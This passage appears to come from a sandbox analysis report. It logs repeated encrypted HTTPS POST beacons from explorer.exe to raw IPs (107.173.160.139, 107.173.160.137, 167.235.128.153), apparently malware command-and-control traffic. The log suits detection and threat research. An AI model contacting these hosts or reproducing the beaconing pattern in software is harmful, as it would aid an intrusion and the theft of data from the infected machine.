                                                                                    2024-07-24 17:58:22 UTC685INData Raw: 51 2b 39 63 36 42 53 4e 33 61 76 2f 73 73 4c 68 4e 76 47 52 43 79 41 57 51 34 4b 53 62 2b 55 66 5a 69 58 58 77 34 6a 69 36 78 47 56 46 71 37 70 77 30 44 47 68 69 31 57 42 54 4f 4e 58 70 6e 6a 6b 79 68 55 6f 6e 6c 6c 6d 6c 39 65 6d 66 36 4b 6d 72 39 59 48 74 69 46 6c 78 54 36 6b 36 6b 50 35 64 33 6c 33 42 43 56 49 50 75 74 59 59 59 54 68 45 66 65 32 47 4b 42 68 41 37 44 77 76 42 78 57 49 37 4c 4b 39 38 54 43 47 35 4a 2b 38 7a 45 51 45 6d 39 39 2f 39 74 30 66 6f 4e 69 69 2b 50 6c 71 63 72 47 56 56 35 41 68 73 71 65 75 4b 4b 56 4b 44 32 39 2b 48 49 4c 47 74 33 69 7a 62 7a 48 42 32 2b 66 52 7a 74 35 47 7a 6e 67 5a 74 2b 6f 73 77 61 4b 48 53 58 37 53 57 49 78 46 45 62 6e 59 63 78 56 52 66 38 59 37 73 51 4b 42 2b 6e 39 4a 73 64 2b 36 61 35 4a 36 64 4e 50 4e 76
                                                                                    Data Ascii: Q+9c6BSN3av/ssLhNvGRCyAWQ4KSb+UfZiXXw4ji6xGVFq7pw0DGhi1WBTONXpnjkyhUonllml9emf6Kmr9YHtiFlxT6k6kP5d3l3BCVIPutYYYThEfe2GKBhA7DwvBxWI7LK98TCG5J+8zEQEm99/9t0foNii+PlqcrGVV5AhsqeuKKVKD29+HILGt3izbzHB2+fRzt5GzngZt+oswaKHSX7SWIxFEbnYcxVRf8Y7sQKB+n9Jsd+6a5J6dNPNv


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    75192.168.2.1049830107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:22 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:22 UTC1122OUTData Raw: 62 77 4f 4f 77 5a 48 41 2b 47 55 76 51 38 57 4e 70 69 4a 33 6f 30 77 77 69 6e 51 4b 58 52 4e 68 30 69 72 33 50 6c 32 34 58 7a 53 43 57 72 45 69 59 69 57 44 32 59 30 52 77 6a 30 44 36 66 50 44 5a 37 56 42 4f 53 65 78 6f 74 34 66 73 75 59 4e 53 6b 6a 57 4f 50 55 42 6a 66 59 67 4c 53 45 51 62 4b 6c 4c 32 65 6a 4b 56 69 36 34 54 79 46 6a 50 7a 39 50 6f 57 6a 34 33 6b 43 49 48 54 55 38 39 65 6d 55 6e 79 69 57 79 56 37 69 6e 37 36 68 78 2b 50 69 41 7a 55 4e 65 63 58 4b 37 74 5a 6b 76 33 6e 2b 76 78 47 6e 4d 6e 5a 66 4a 43 42 30 61 6f 57 2f 38 39 36 41 78 49 71 41 2b 67 68 4f 37 37 7a 73 63 53 41 39 66 6a 6b 48 38 71 6b 32 61 50 54 54 30 6a 58 54 2b 34 65 49 2b 41 6e 7a 6b 2f 51 31 69 49 49 58 6b 48 34 31 45 2f 58 45 35 36 53 66 32 66 6e 6b 70 2b 56 4c 47 61 75
                                                                                    Data Ascii: bwOOwZHA+GUvQ8WNpiJ3o0wwinQKXRNh0ir3Pl24XzSCWrEiYiWD2Y0Rwj0D6fPDZ7VBOSexot4fsuYNSkjWOPUBjfYgLSEQbKlL2ejKVi64TyFjPz9PoWj43kCIHTU89emUnyiWyV7in76hx+PiAzUNecXK7tZkv3n+vxGnMnZfJCB0aoW/896AxIqA+ghO77zscSA9fjkH8qk2aPTT0jXT+4eI+Anzk/Q1iIIXkH41E/XE56Sf2fnkp+VLGau
                                                                                    2024-07-24 17:58:25 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:24 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:25 UTC685INData Raw: 56 6f 48 67 77 64 38 75 4f 59 44 65 74 73 41 7a 32 6d 44 53 4a 39 67 6b 6f 67 42 58 59 4d 32 6e 68 65 66 38 33 34 6c 64 56 53 71 67 36 43 75 74 6c 33 74 6e 38 33 39 67 72 58 43 4e 76 74 76 71 46 2f 6c 44 59 65 62 65 59 46 33 7a 62 79 7a 6d 61 72 63 78 79 48 58 7a 4e 32 49 65 75 65 72 7a 2f 42 63 78 59 45 70 49 59 51 79 62 77 72 39 64 53 58 4c 30 42 62 74 65 47 6d 43 76 71 67 50 6f 47 32 52 66 51 5a 75 34 34 44 44 58 61 62 2f 62 36 6d 6e 41 4b 39 6b 78 31 53 6e 75 4c 65 56 4c 79 70 6b 43 49 67 73 58 62 42 68 76 2f 31 6a 77 4e 53 32 71 4a 49 54 52 6c 39 71 32 33 30 6b 5a 70 70 4a 6d 73 72 50 42 48 2b 4b 49 37 76 79 48 6a 74 39 32 35 61 4a 77 57 53 6c 62 66 6b 52 4b 71 38 4f 32 5a 33 39 38 58 7a 57 46 35 67 50 44 4f 41 72 69 76 75 38 75 38 4a 7a 61 35 53 36
                                                                                    Data Ascii: VoHgwd8uOYDetsAz2mDSJ9gkogBXYM2nhef834ldVSqg6Cutl3tn839grXCNvtvqF/lDYebeYF3zbyzmarcxyHXzN2Ieuerz/BcxYEpIYQybwr9dSXL0BbteGmCvqgPoG2RfQZu44DDXab/b6mnAK9kx1SnuLeVLypkCIgsXbBhv/1jwNS2qJITRl9q230kZppJmsrPBH+KI7vyHjt925aJwWSlbfkRKq8O2Z398XzWF5gPDOArivu8u8Jza5S6


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    76192.168.2.1049831167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:26 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:58:26 UTC1267OUTData Raw: 62 74 53 6a 4b 4b 72 66 68 76 66 78 5a 79 48 67 35 47 72 6c 42 52 39 38 52 30 30 65 36 42 32 75 45 56 4e 67 45 6e 4e 46 47 64 48 70 2b 30 33 61 36 2b 5a 77 67 4c 68 6a 78 70 62 69 42 47 68 7a 5a 51 4e 6a 43 50 76 75 4f 79 37 71 37 2f 68 49 6c 44 6e 6f 6b 64 69 35 36 5a 4a 35 6a 76 35 5a 7a 34 56 70 6a 46 65 69 47 30 4b 77 44 69 31 58 37 7a 53 6d 44 6e 71 2f 6c 4a 4f 37 56 64 6e 73 33 76 72 59 53 6d 39 49 30 57 4d 62 4c 56 4c 7a 51 47 79 6d 47 30 79 59 32 33 36 68 58 42 64 2b 61 33 41 2b 70 33 43 73 4d 4a 51 73 51 32 76 61 4a 76 51 51 58 4b 4e 7a 75 32 69 2f 51 74 72 6c 6e 78 65 49 33 4b 52 31 6a 75 79 46 76 68 6a 4c 6e 63 46 2b 68 64 2b 49 68 4a 6b 36 50 2b 56 33 74 78 47 33 62 56 46 6e 6c 30 61 6e 65 42 5a 4d 54 4f 4d 45 4a 72 4c 6d 53 35 48 46 37 71 66
                                                                                    Data Ascii: btSjKKrfhvfxZyHg5GrlBR98R00e6B2uEVNgEnNFGdHp+03a6+ZwgLhjxpbiBGhzZQNjCPvuOy7q7/hIlDnokdi56ZJ5jv5Zz4VpjFeiG0KwDi1X7zSmDnq/lJO7Vdns3vrYSm9I0WMbLVLzQGymG0yY236hXBd+a3A+p3CsMJQsQ2vaJvQQXKNzu2i/QtrlnxeI3KR1juyFvhjLncF+hd+IhJk6P+V3txG3bVFnl0aneBZMTOMEJrLmS5HF7qf
                                                                                    2024-07-24 17:58:28 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:27 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:28 UTC685INData Raw: 52 49 2b 42 56 5a 6a 4e 66 55 73 44 50 78 65 58 6b 74 39 68 4f 68 53 7a 48 43 49 41 57 65 46 6c 77 4f 5a 6a 70 34 6d 54 39 5a 6f 67 71 37 44 36 78 6c 6c 31 62 6e 2b 32 74 67 53 4b 4d 32 66 31 49 32 4e 65 73 62 69 56 42 66 2f 57 50 34 67 36 2b 6a 6f 4c 72 34 6e 38 34 48 61 69 37 6e 74 64 45 2f 61 70 59 4e 41 52 47 43 35 47 4f 67 55 47 2f 6e 49 52 6d 6b 30 6a 73 48 73 68 47 2b 45 51 30 31 72 48 44 32 65 58 71 64 57 77 46 30 74 4a 58 72 39 55 78 5a 30 74 77 35 6b 4b 6a 74 49 45 41 62 69 79 6f 64 57 73 32 35 61 42 78 6d 38 74 55 68 47 51 37 43 35 36 31 34 4d 58 74 4b 39 70 41 75 5a 4b 6b 65 5a 42 45 4b 66 2f 66 7a 38 6f 37 69 34 51 47 71 4d 65 73 50 35 2f 46 56 51 49 7a 48 4c 62 42 33 30 41 54 34 33 6d 31 30 2f 48 68 6d 6d 47 35 74 50 53 5a 4d 68 65 73 39 65
                                                                                    Data Ascii: RI+BVZjNfUsDPxeXkt9hOhSzHCIAWeFlwOZjp4mT9Zogq7D6xll1bn+2tgSKM2f1I2NesbiVBf/WP4g6+joLr4n84Hai7ntdE/apYNARGC5GOgUG/nIRmk0jsHshG+EQ01rHD2eXqdWwF0tJXr9UxZ0tw5kKjtIEAbiyodWs25aBxm8tUhGQ7C5614MXtK9pAuZKkeZBEKf/fz8o7i4QGqMesP5/FVQIzHLbB30AT43m10/HhmmG5tPSZMhes9e


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    77192.168.2.1049832107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:28 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:28 UTC1122OUTData Raw: 70 75 6e 6f 4d 54 53 64 6e 4f 47 56 6d 4a 68 43 4f 62 6f 39 7a 2f 71 48 34 47 73 6d 6e 64 5a 4f 4b 4d 59 6c 5a 67 67 71 72 6d 66 7a 32 50 6f 6a 76 6b 75 59 49 39 6c 32 78 30 56 75 70 49 71 7a 51 71 6f 38 39 42 39 6e 62 61 4a 4d 53 46 2b 59 47 48 6a 4e 4a 4a 36 61 54 53 6a 64 47 4c 47 5a 4b 78 73 6f 30 74 36 6c 51 69 44 69 63 68 75 64 77 4e 36 2f 46 6e 46 36 4a 6b 2f 7a 6a 66 44 53 71 6d 33 74 64 43 62 65 77 30 52 46 69 6f 55 7a 52 69 43 71 39 57 43 51 2f 53 30 6b 48 54 59 31 5a 44 51 57 66 4e 42 51 2b 75 44 7a 57 4f 2f 4c 73 4e 32 6d 66 64 68 53 54 63 6e 6e 63 6f 6d 72 6c 43 46 78 52 78 7a 58 54 54 49 36 2b 39 62 5a 32 45 71 63 59 65 61 6b 75 36 55 57 39 38 6a 59 6b 41 66 55 73 52 39 38 47 39 48 4d 32 4c 50 6e 56 51 53 77 38 72 77 52 53 68 73 54 38 73 36
                                                                                    Data Ascii: punoMTSdnOGVmJhCObo9z/qH4GsmndZOKMYlZggqrmfz2PojvkuYI9l2x0VupIqzQqo89B9nbaJMSF+YGHjNJJ6aTSjdGLGZKxso0t6lQiDichudwN6/FnF6Jk/zjfDSqm3tdCbew0RFioUzRiCq9WCQ/S0kHTY1ZDQWfNBQ+uDzWO/LsN2mfdhSTcnncomrlCFxRxzXTTI6+9bZ2EqcYeaku6UW98jYkAfUsR98G9HM2LPnVQSw8rwRShsT8s6
                                                                                    2024-07-24 17:58:30 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:30 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:30 UTC685INData Raw: 42 32 54 77 4b 56 46 66 6b 36 32 6e 37 71 63 68 37 39 58 45 42 30 77 69 50 49 70 30 56 62 4a 4a 43 31 77 48 58 78 46 41 4c 75 6f 42 65 69 4a 74 36 78 32 47 4a 6d 33 75 54 77 78 68 36 44 35 4d 41 4c 76 78 2b 30 59 64 71 77 35 41 4f 6f 7a 4c 4e 4e 30 32 4f 47 6c 42 65 34 35 4f 42 4b 68 5a 4d 63 30 61 78 44 2b 35 49 44 55 45 33 4b 72 6c 64 31 59 51 47 61 48 36 47 49 66 45 49 6f 78 49 32 52 49 77 61 65 31 6d 48 63 45 39 2b 4c 5a 41 43 59 50 54 57 65 70 79 44 78 31 5a 42 49 6c 4c 64 4a 54 42 41 51 75 74 43 35 62 55 70 2f 6e 6b 6b 44 6f 6b 65 4d 74 43 71 69 68 71 37 4b 65 70 57 32 4a 48 62 4d 43 6d 31 72 64 32 54 4b 36 66 64 4d 46 48 4b 58 59 41 56 51 68 38 56 2b 45 53 39 73 52 43 30 32 4f 76 56 6c 2f 42 67 65 6c 4f 52 50 48 38 77 39 35 4a 2b 37 65 2b 6e 74 55
                                                                                    Data Ascii: B2TwKVFfk62n7qch79XEB0wiPIp0VbJJC1wHXxFALuoBeiJt6x2GJm3uTwxh6D5MALvx+0Ydqw5AOozLNN02OGlBe45OBKhZMc0axD+5IDUE3Krld1YQGaH6GIfEIoxI2RIwae1mHcE9+LZACYPTWepyDx1ZBIlLdJTBAQutC5bUp/nkkDokeMtCqihq7KepW2JHbMCm1rd2TK6fdMFHKXYAVQh8V+ES9sRC02OvVl/BgelORPH8w95J+7e+ntU


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    78192.168.2.1049834107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:31 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:31 UTC1122OUTData Raw: 45 39 67 61 7a 38 75 56 6c 39 7a 56 79 49 56 42 59 39 78 43 43 4d 5a 4b 37 42 56 42 2b 4f 37 35 32 43 45 41 54 59 4e 6e 36 4e 64 79 72 64 72 4a 69 6b 44 6c 50 6a 4d 76 55 70 62 4c 43 41 33 67 4e 43 44 56 66 41 6a 6a 63 32 6c 64 2b 5a 4c 43 38 57 79 63 77 7a 58 42 70 31 37 66 53 6c 41 6e 30 70 63 77 31 4f 70 5a 35 70 61 62 75 69 67 61 7a 34 73 73 43 39 70 46 55 39 63 59 63 59 61 6c 7a 32 45 5a 56 66 33 2b 6c 37 37 4c 50 4c 74 77 63 31 77 4c 38 65 43 37 42 32 2b 64 2b 34 46 39 71 2b 57 55 6d 7a 72 62 55 72 34 61 68 76 71 65 77 72 51 41 52 50 5a 49 67 6d 2f 30 62 6c 63 52 4d 33 4c 6e 48 7a 65 43 5a 69 77 33 38 33 59 54 6f 5a 48 2f 35 4a 63 6e 64 75 41 77 54 55 51 46 4a 6a 31 4f 65 34 54 38 6d 36 66 50 6e 59 2f 73 32 74 49 35 42 72 77 49 4f 55 73 4f 61 43 38
                                                                                    Data Ascii: E9gaz8uVl9zVyIVBY9xCCMZK7BVB+O752CEATYNn6NdyrdrJikDlPjMvUpbLCA3gNCDVfAjjc2ld+ZLC8WycwzXBp17fSlAn0pcw1OpZ5pabuigaz4ssC9pFU9cYcYalz2EZVf3+l77LPLtwc1wL8eC7B2+d+4F9q+WUmzrbUr4ahvqewrQARPZIgm/0blcRM3LnHzeCZiw383YToZH/5JcnduAwTUQFJj1Oe4T8m6fPnY/s2tI5BrwIOUsOaC8
                                                                                    2024-07-24 17:58:32 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:32 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:32 UTC685INData Raw: 46 4e 5a 67 39 55 4e 44 72 70 4c 39 57 51 56 44 32 63 6b 56 58 5a 6f 54 34 45 44 74 4b 70 72 39 6f 68 42 38 77 45 65 34 31 4b 7a 31 6c 78 6c 78 6e 61 6c 62 47 61 58 75 59 38 59 50 65 31 46 45 66 56 34 33 36 6f 4a 5a 33 59 68 64 5a 72 47 51 51 76 39 58 6e 31 50 2f 70 5a 50 51 34 6a 51 39 61 51 5a 59 76 64 74 48 4e 4d 31 43 63 37 2b 65 36 56 56 2f 53 67 31 4e 58 52 54 68 30 57 37 4c 71 5a 41 7a 49 6e 56 79 66 69 39 70 7a 37 64 4b 51 30 48 75 76 34 4c 4c 39 69 5a 37 53 57 55 30 66 6d 73 63 70 44 56 66 63 47 31 47 41 49 42 6f 73 70 59 54 77 33 33 54 57 51 59 6c 74 33 71 43 62 68 6d 72 31 48 6c 44 37 2b 71 36 73 7a 55 74 73 73 4c 4f 55 6b 77 50 6a 76 4e 75 77 54 4d 37 78 64 57 71 75 49 51 64 70 2f 69 6d 77 61 65 43 4f 71 52 55 4c 66 63 56 55 65 6b 54 51 49 67
                                                                                    Data Ascii: FNZg9UNDrpL9WQVD2ckVXZoT4EDtKpr9ohB8wEe41Kz1lxlxnalbGaXuY8YPe1FEfV436oJZ3YhdZrGQQv9Xn1P/pZPQ4jQ9aQZYvdtHNM1Cc7+e6VV/Sg1NXRTh0W7LqZAzInVyfi9pz7dKQ0Huv4LL9iZ7SWU0fmscpDVfcG1GAIBospYTw33TWQYlt3qCbhmr1HlD7+q6szUtssLOUkwPjvNuwTM7xdWquIQdp/imwaeCOqRULfcVUekTQIg


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    79192.168.2.1049835167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:33 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:33 UTC1122OUTData Raw: 59 58 52 75 47 38 39 48 46 70 37 32 76 6d 5a 51 47 52 75 75 69 34 6d 68 34 45 38 45 36 48 49 4c 4a 6b 4d 61 64 7a 76 2f 79 41 69 49 6f 63 52 50 6a 63 75 43 75 65 4e 42 63 56 67 67 6b 55 64 4b 77 6d 31 77 45 6f 47 61 71 6d 44 78 42 5a 4c 2f 69 55 32 77 74 34 66 32 32 51 7a 78 61 36 36 39 4c 51 6e 5a 79 74 6f 58 49 54 71 6a 78 6e 71 48 48 5a 64 61 72 39 4a 57 47 42 56 62 36 41 36 50 2f 71 4a 4c 59 6c 30 4f 37 47 7a 39 67 37 42 56 31 4b 36 4f 6d 62 4a 56 53 6f 78 53 31 38 38 45 46 64 4e 74 61 2b 39 77 56 55 54 79 57 50 62 39 39 4f 67 64 36 49 6e 55 4e 30 71 5a 32 35 61 6b 44 54 49 44 48 73 6a 30 74 66 4e 63 5a 71 69 65 30 46 2b 4f 35 54 32 6b 61 39 36 4b 43 33 58 31 67 36 59 61 55 6c 4e 45 4f 36 51 59 69 6c 76 6f 54 62 44 6f 59 56 78 70 4a 46 54 72 7a 44 4e
                                                                                    Data Ascii: YXRuG89HFp72vmZQGRuui4mh4E8E6HILJkMadzv/yAiIocRPjcuCueNBcVggkUdKwm1wEoGaqmDxBZL/iU2wt4f22Qzxa669LQnZytoXITqjxnqHHZdar9JWGBVb6A6P/qJLYl0O7Gz9g7BV1K6OmbJVSoxS188EFdNta+9wVUTyWPb99Ogd6InUN0qZ25akDTIDHsj0tfNcZqie0F+O5T2ka96KC3X1g6YaUlNEO6QYilvoTbDoYVxpJFTrzDN
                                                                                    2024-07-24 17:58:35 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:34 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:35 UTC685INData Raw: 63 34 66 63 4e 58 33 49 66 66 6a 77 33 38 39 2b 6d 6a 47 55 6d 41 79 53 48 42 4c 6a 51 47 44 61 78 70 70 77 2f 64 4e 59 5a 5a 78 69 41 44 49 5a 45 41 67 53 2f 4f 73 34 44 50 32 44 2f 51 54 57 4a 73 6b 6a 59 77 63 71 54 65 44 43 65 4b 79 2b 44 46 4b 34 45 47 47 77 73 49 57 45 67 64 63 50 79 48 32 35 53 41 79 30 43 49 30 41 34 36 64 50 32 58 66 35 48 4d 78 49 6c 58 70 50 71 49 6c 46 75 71 75 47 75 72 6a 36 6e 42 68 39 6d 79 4b 31 45 44 61 6a 4f 41 34 4c 42 34 78 49 59 53 43 72 55 75 6b 6e 38 61 32 4d 76 35 76 59 6f 54 38 30 69 77 61 4c 67 42 66 74 61 78 2f 34 64 67 41 61 42 6d 7a 79 46 7a 46 48 6c 50 75 78 71 37 52 46 5a 75 79 59 6a 32 61 68 44 74 71 6e 69 6a 71 4d 2b 35 58 36 69 5a 70 33 61 7a 49 7a 71 32 6b 6e 43 62 5a 4e 4b 6a 55 56 56 48 77 76 78 50 49
                                                                                    Data Ascii: c4fcNX3Iffjw389+mjGUmAySHBLjQGDaxppw/dNYZZxiADIZEAgS/Os4DP2D/QTWJskjYwcqTeDCeKy+DFK4EGGwsIWEgdcPyH25SAy0CI0A46dP2Xf5HMxIlXpPqIlFuquGurj6nBh9myK1EDajOA4LB4xIYSCrUukn8a2Mv5vYoT80iwaLgBftax/4dgAaBmzyFzFHlPuxq7RFZuyYj2ahDtqnijqM+5X6iZp3azIzq2knCbZNKjUVVHwvxPI


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    80192.168.2.1049836107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:35 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:35 UTC1122OUTData Raw: 59 43 63 57 4a 34 74 5a 55 4d 46 70 39 39 2b 53 66 49 62 6c 6d 51 31 44 32 6f 56 44 76 46 36 7a 4e 6c 30 76 76 2b 76 68 71 4c 74 6b 4c 4e 4a 30 52 51 74 34 41 67 75 78 33 69 67 61 70 6b 64 39 39 2b 77 71 4c 73 32 32 2f 54 6d 58 39 6e 53 6b 4e 42 42 76 30 2b 73 69 2b 42 75 64 44 74 52 6e 74 47 5a 75 57 47 4c 6f 56 55 66 56 38 55 68 35 69 64 4e 46 73 65 31 77 4b 79 52 69 6a 63 59 6d 36 64 7a 35 64 69 6c 39 38 49 30 37 4d 32 53 54 78 43 63 43 48 4a 65 50 73 78 35 56 47 67 62 64 58 4f 37 33 6f 7a 42 59 50 63 4e 62 6d 6d 38 70 4a 73 44 73 6b 38 39 56 4b 63 2f 74 65 4d 2f 38 4b 57 38 41 6f 39 6b 4f 49 6c 67 47 74 67 75 78 77 6e 78 65 52 4d 37 39 36 78 4f 49 47 71 31 41 56 36 78 5a 74 36 54 76 2b 34 6a 59 67 61 59 76 38 4e 72 46 6a 56 67 73 43 44 6e 6c 41 34 44
                                                                                    Data Ascii: YCcWJ4tZUMFp99+SfIblmQ1D2oVDvF6zNl0vv+vhqLtkLNJ0RQt4Agux3igapkd99+wqLs22/TmX9nSkNBBv0+si+BudDtRntGZuWGLoVUfV8Uh5idNFse1wKyRijcYm6dz5dil98I07M2STxCcCHJePsx5VGgbdXO73ozBYPcNbmm8pJsDsk89VKc/teM/8KW8Ao9kOIlgGtguxwnxeRM796xOIGq1AV6xZt6Tv+4jYgaYv8NrFjVgsCDnlA4D
                                                                                    2024-07-24 17:58:37 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:37 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:37 UTC685INData Raw: 52 70 6c 4e 4b 54 73 73 34 37 65 44 48 69 74 65 37 4c 74 6e 7a 42 52 33 51 4a 72 4b 37 34 65 4b 61 59 6d 47 4c 6d 63 43 65 45 36 79 47 7a 5a 36 6c 7a 4e 44 58 76 46 41 57 31 59 53 2f 34 5a 71 65 43 78 71 7a 6b 47 4a 76 4a 34 2b 73 78 58 42 78 50 51 43 62 65 35 4b 78 59 64 38 4f 36 6e 34 74 50 2b 38 4b 37 41 52 46 66 41 4e 45 57 75 73 61 49 5a 57 4c 61 2f 6f 76 71 46 57 68 54 76 43 4d 44 35 2b 64 6a 62 6c 70 71 34 44 61 6c 38 6a 34 37 79 74 67 51 63 6e 72 6e 72 35 54 42 4f 76 75 42 7a 63 52 36 44 74 57 66 75 38 2b 37 64 4d 39 35 4e 6f 38 30 4a 67 63 37 48 76 71 4e 33 4b 54 37 43 55 61 66 69 55 4c 73 5a 39 52 74 51 46 2f 4b 65 5a 6a 33 44 41 55 72 4e 41 4f 77 77 50 66 32 39 70 2b 53 66 2b 6c 61 45 33 68 61 67 39 68 51 32 30 55 74 4f 56 66 67 41 56 47 36 59
                                                                                    Data Ascii: RplNKTss47eDHite7LtnzBR3QJrK74eKaYmGLmcCeE6yGzZ6lzNDXvFAW1YS/4ZqeCxqzkGJvJ4+sxXBxPQCbe5KxYd8O6n4tP+8K7ARFfANEWusaIZWLa/ovqFWhTvCMD5+djblpq4Dal8j47ytgQcnrnr5TBOvuBzcR6DtWfu8+7dM95No80Jgc7HvqN3KT7CUafiULsZ9RtQF/KeZj3DAUrNAOwwPf29p+Sf+laE3hag9hQ20UtOVfgAVG6Y


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    81192.168.2.1049837107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:38 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:38 UTC1122OUTData Raw: 68 6e 4c 31 31 6e 4c 55 43 57 48 42 50 72 49 66 4e 67 50 74 4c 37 6d 75 69 51 45 5a 74 75 72 73 37 50 73 47 4c 69 52 7a 70 33 41 45 49 49 69 32 4f 54 62 4b 4c 6a 79 32 46 6c 6f 65 68 7a 5a 51 44 53 6a 63 59 30 43 2f 6a 78 74 47 7a 61 76 4a 61 37 42 46 78 45 47 45 41 6b 30 75 76 72 52 65 51 76 39 56 65 30 43 63 73 38 6e 74 6e 31 4b 2f 34 44 61 68 49 36 62 39 6f 51 2b 6c 76 4c 45 58 7a 6b 61 49 64 35 48 67 47 52 64 48 6e 6d 6a 43 6d 30 7a 55 61 72 2f 47 4f 2b 78 6b 48 61 53 6d 4c 50 56 5a 6e 66 43 71 45 34 46 52 30 74 77 30 41 47 50 5a 35 73 58 77 47 58 76 6d 44 48 68 77 4f 78 4a 77 44 76 70 4c 56 56 2b 67 6c 5a 58 4f 2b 2b 4a 55 6e 32 53 38 6f 68 53 35 43 46 38 75 65 53 6b 79 6e 79 4f 79 79 43 2b 4e 7a 2f 79 54 35 78 2f 2f 39 50 33 63 71 65 44 38 37 31 69
                                                                                    Data Ascii: hnL11nLUCWHBPrIfNgPtL7muiQEZturs7PsGLiRzp3AEIIi2OTbKLjy2FloehzZQDSjcY0C/jxtGzavJa7BFxEGEAk0uvrReQv9Ve0Ccs8ntn1K/4DahI6b9oQ+lvLEXzkaId5HgGRdHnmjCm0zUar/GO+xkHaSmLPVZnfCqE4FR0tw0AGPZ5sXwGXvmDHhwOxJwDvpLVV+glZXO++JUn2S8ohS5CF8ueSkynyOyyC+Nz/yT5x//9P3cqeD871i
                                                                                    2024-07-24 17:58:39 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:39 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
